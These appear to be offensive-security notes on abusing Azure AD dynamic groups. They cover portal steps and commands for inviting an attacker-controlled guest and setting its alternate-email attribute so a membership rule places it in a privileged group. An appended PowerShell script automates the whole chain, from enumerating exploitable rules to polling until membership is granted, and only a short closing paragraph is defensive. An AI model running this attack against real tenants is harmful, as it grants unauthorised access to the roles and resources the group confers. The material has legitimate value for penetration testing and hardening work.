Abuse Dynamic Groups
- dynamic groups add users or devices to the group automatically, based on a membership rule that queries directory attributes (e.g. userType, otherMails, department); whoever can set an attribute value that satisfies the rule can place a principal in the group and inherit whatever roles, licenses or access the group grants
- a guest user can manage some fields of their own profile, including:
  manager
  alternate/secondary email (stored in the otherMails attribute, which membership rules can match on)
Enumerate Dynamic Groups
# enumerate the dynamic group's condition: look for GroupTypes containing DynamicMembership, the MembershipRule
# string (e.g. a rule on user.otherMails) and MembershipRuleProcessingState
Get-AzADGroup -ObjectId f6c94d79-3eed-40ca-9ba9-d9743a4a1a4e | fl
Abuse this by inviting a new user (an external account you control) as a guest
- Users → All users → Invite user
- open the new user's profile → Invitation status → Resend invitation → copy the invitation URL
- open the invitation URL in a new (private) browser window and redeem it as the invited account
- log in, then use the directory switcher to switch from the guest's home directory to the target directory
# invite a new user as guest (in this case)
# you can get the invitation link when you click "Resend invitation" on the user in portal.azure.com
# or: use PowerShell (AzureAD module) for the invitation; the returned object also contains
# InviteRedeemUrl and InvitedUser.Id, so no portal round trip is needed
New-AzureADMSInvitation -InvitedUserDisplayName "InvitedAttacker1" -InvitedUserEmailAddress "[email protected]" -InviteRedirectURL https://portal.azure.com -SendInvitationMessage $true
# get the new guest's object id (here via user thomas) and set the attribute the membership rule keys on;
# here that is the alternate email (otherMails), so set a value that satisfies the rule
Set-AzureADUser -ObjectId 49b3dacd-61c5-43b9-93c0-88fd7c709a25 -OtherMails "[email protected]" -Verbose
Note: the attribute update can take several minutes before dynamic membership is re-evaluated and the guest shows up in the group; re-query the group's members (and MembershipRuleProcessingState) rather than assuming the change has applied.
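The two pieces above (enumerating the dynamic rule, then inviting a guest and setting the attribute it keys on) chained into one script, as an added example that is not part of the original notes. It assumes the AzureAD module with Connect-AzureAD already run as the inviting account, that the target rule matches on otherMails, and uses placeholder values: the attacker-controlled address, the "vendor" value the rule is assumed to look for, and the otherMails|userType pattern used to pick out rules a low-privileged account can influence are all assumptions for this example.

```powershell
# Added example, not from the original notes. Assumes: AzureAD module, Connect-AzureAD done as
# the inviting account, and a dynamic rule that matches on user.otherMails (e.g. "vendor").
# All addresses and the "vendor" value are placeholders.

# 1. Enumerate every dynamic group and show its membership rule
$dynamicGroups = Get-AzureADMSGroup -All $true |
    Where-Object { $_.GroupTypes -contains 'DynamicMembership' }
$dynamicGroups |
    Select-Object DisplayName, Id, MembershipRule, MembershipRuleProcessingState |
    Format-List

# 2. Flag rules keyed on attributes a low-privileged account can influence:
#    otherMails (alternate email) or userType (set to Guest by inviting someone).
#    The attribute pattern is an assumption for this example, not an exhaustive list.
$interesting = $dynamicGroups | Where-Object { $_.MembershipRule -match 'otherMails|userType' }
$targetGroup = $interesting | Select-Object -First 1
if (-not $targetGroup) { throw 'No dynamic group keys on an attribute this account can influence.' }
"Target group: $($targetGroup.DisplayName) rule: $($targetGroup.MembershipRule)"

# 3. Invite a guest. The returned invitation object carries the redeem URL and the new
#    user's object id, so the portal "Resend invitation" step is not needed.
$inviteParams = @{
    InvitedUserDisplayName  = 'InvitedAttacker1'
    InvitedUserEmailAddress = 'attacker@example.com'    # placeholder: an address the attacker controls
    InviteRedirectUrl       = 'https://portal.azure.com'
    SendInvitationMessage   = $false                    # redeem via the URL below instead of e-mail
}
$inv     = New-AzureADMSInvitation @inviteParams
$guestId = $inv.InvitedUser.Id
"Guest object id: $guestId"
"Redeem URL (open in a private window): $($inv.InviteRedeemUrl)"

# 4. Set the attribute the rule matches on. "vendor-support@example.com" is a placeholder
#    chosen to satisfy an assumed rule such as (user.otherMails -any (_ -contains "vendor")).
Set-AzureADUser -ObjectId $guestId -OtherMails @('vendor-support@example.com')

# 5. Membership is re-evaluated asynchronously; poll instead of assuming it has applied.
$deadline = (Get-Date).AddMinutes(15)
do {
    Start-Sleep -Seconds 60
    $isMember = Get-AzureADGroupMember -ObjectId $targetGroup.Id -All $true |
        Where-Object { $_.ObjectId -eq $guestId }
    $state = (Get-AzureADMSGroup -Id $targetGroup.Id).MembershipRuleProcessingState
    "$(Get-Date -Format T) processing=$state member=$([bool]$isMember)"
} until ($isMember -or (Get-Date) -gt $deadline)

if ($isMember) { "Guest $guestId is now a member of $($targetGroup.DisplayName)" }
else           { "Membership not reflected within the timeout; check the rule and the attribute value" }
```

Step 4 only succeeds if the calling account is allowed to update the new guest's attributes, which is the same precondition the Set-AzureADUser line above relies on. From the defensive side, the check this script automates is the one worth running in your own tenant: any dynamic rule whose MembershipRule references otherMails, userType or another attribute that end users or guests can set themselves should be rewritten against admin-controlled attributes, and guest invitation should be restricted if the group grants meaningful access.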